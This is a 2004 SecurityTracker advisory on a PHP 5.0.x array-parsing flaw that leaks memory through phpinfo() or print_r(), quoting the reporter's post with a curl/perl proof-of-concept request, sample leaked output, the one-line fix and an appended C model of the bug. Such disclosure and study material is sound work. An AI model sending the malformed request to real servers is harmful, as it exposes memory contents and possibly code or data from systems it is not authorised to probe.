SecurityTracker.com
Category:  Application (Generic)  >  Php
Vendors:  PHP Group
PHP Array Parsing Error in php_variables May Disclose Memory Contents via phpinfo()
SecurityTracker Alert ID:  1011279
SecurityTracker URL:  http://securitytracker.com/id?1011279
CVE Reference:  CAN-2004-0958   (Links to External Site)
Updated:  Oct 19 2004
Original Entry Date:  Sep 15 2004
Impact:  Disclosure of system information, Disclosure of user information
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): 5.0 - 5.0.1
Description:  A vulnerability was reported in PHP in the phpinfo() function. A remote user may be able to obtain memory contents.

Stefano Di Paola reported that an array parsing error in 'php_variables.c' may cause the system to display arbitrary memory contents. A remote user can append a GET, POST, or COOKIE variable array to a request to trigger the flaw.

A demonstration exploit is shown [where 'phpinfo.php' contains the phpinfo() function]:

$ curl "http://www.example.com/phpinfo.php" -d `perl -e 'print "f"x100;print "[g][=1"'`

Alternately, the file may contain a print_r($_REQUEST) function call.

Impact:  A remote user may be able to obtain random memory contents.
Solution:  A fix is available via CVS:

http://chora.php.net/php-src/main/php_variables.c

Vendor URL:  www.php.net/ (Links to External Site)
Cause:  Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Stefano Di Paola <stefano.dipaola@wisec.it>
Message History:   None.


Source Message Contents

Date:  Wed, 15 Sep 2004 18:59:41 +0200
From:  Stefano Di Paola <stefano.dipaola@wisec.it>
Subject:  PHP Vulnerability N. 1

 

Hi all,
This summer I have been playing around with some PHP issues
and got some PHP vulnerabilities.

Let's go for the first one:



==========================================================
Title: php(super)info().
Affected: Php <= 5.0.1
Not Affected: it seems Php <= 4.1.2
Vulnerability Type:  Exposure of sensitive information
Vendor Status: Fix released on cvs.php.net


==Summary:

Bad array parsing in php_variables.c could lead to showing arbitrary memory
content such as pieces of PHP code and other data.
This affects all GET, POST or COOKIE variables.



==Description:

By appending to a GET/POST/COOKIE variable array a [ (open square
bracket), like abc[a][,
the length of the 'a' array element is set to the length of the variable
name, strlen("abc").


$ curl "http://www.example.com/phpinfo.php" -d `perl -e 'print "f"x100;print "[g][=1"'`

where phpinfo.php is:
<?php
phpinfo();
?>

or some PHP file containing a print_r() call:
<?php
print_r($_REQUEST);
?>

it will print output similar to:
------------------------------------------------
  Array
 
    [ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
      ffffffffffffffffffffffffffffffffffffffff] => Array
        (
           
[g\0_\0123\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0] => 1
        )
 
-----------------------------------------------

As you probably might have noticed, all the garbage shown is memory
content that could be anything (on the heap, I suppose).

I have tried some requests and it exposes some pieces of PHP code sometimes.




==Solution: 
Authors were contacted and they released a fix for this problem.

The problem is easy to fix.

Find and replace around line 136 for php 5.0.1 in main/php_variables.c
from:

index_len = var_len = strlen(var);

to:

index_len = var_len = strlen(index);
and compile again.

But if you're lazy, the patch can be found on the CVS:
cvs.php.net/main/php_variables.c

=========================================


Stefano Di Paola

....----oOOo-------oOOo----....
Stefano Di Paola
Software Engineer
stefano.dipaola_at_wisec_dot_it
stefano.dipaola1_at_tin_dot_it
--------------------------------
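As an added illustration (not PHP's source and not part of the original report), the following C program is a simplified model of the index parsing that the one-line fix above changes: on a nested unterminated '[' the buggy length comes from strlen(var), the base name, while the fixed length comes from strlen(index), the current index segment. The 100-byte name and the trailing pretend heap bytes are constructed so that the over-read stays inside the program's own buffer.

```c
#include <stdio.h>
#include <string.h>

/* Simplified model of the php_variables.c index parser from the advisory (not
 * PHP's code). It splits "name[i][j]" in place, NUL-terminating each segment.
 * On an unterminated '[' the key length is computed the buggy way, strlen(var)
 * (base name), or the fixed way, strlen(index) (the current index segment). */
typedef struct { const char *key; size_t key_len; } var_key;

static var_key parse_var(char *var, int fixed)
{
    char *index = var;                      /* segment that becomes the key */
    char *p = strchr(var, '[');
    if (!p) { var_key k = { var, strlen(var) }; return k; }
    *p = '\0';                              /* terminate the base name */
    for (;;) {
        char *index_s = ++p;
        p = strchr(p, ']');
        if (!p) {                           /* unterminated '[' */
            *(index_s - 1) = '_';
            size_t len = fixed ? strlen(index) : strlen(var);
            var_key k = { index, len };
            return k;
        }
        *p = '\0';
        index = index_s;
        if (*++p != '[') { var_key k = { index, strlen(index) }; return k; }
    }
}

/* Lays out the advisory's name ("f" x 100 + "[g][") in a buffer whose tail is a
 * constructed stand-in for adjacent heap bytes, and returns how many bytes past
 * the real index string a key of the computed length would cover. */
static size_t overread_bytes(int fixed)
{
    char buf[256];
    memset(buf, 'H', sizeof buf);           /* 'H' marks pretend heap bytes */
    memset(buf, 'f', 100);
    memcpy(buf + 100, "[g][", 5);           /* includes the NUL terminator */
    var_key k = parse_var(buf, fixed);
    size_t real = strlen(k.key);
    return k.key_len > real ? k.key_len - real : 0;
}

int main(void)
{
    printf("buggy strlen(var):   key covers %zu bytes past the index\n", overread_bytes(0));
    printf("fixed strlen(index): key covers %zu bytes past the index\n", overread_bytes(1));
    return 0;
}
```

With the buggy length the one-character key "g" is registered with a 100-byte length, so 99 bytes following it are copied into the key shown by phpinfo() or print_r(); with the fix the length matches the index and nothing past it is read.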


 








Copyright 2004, SecurityGlobal.net LLC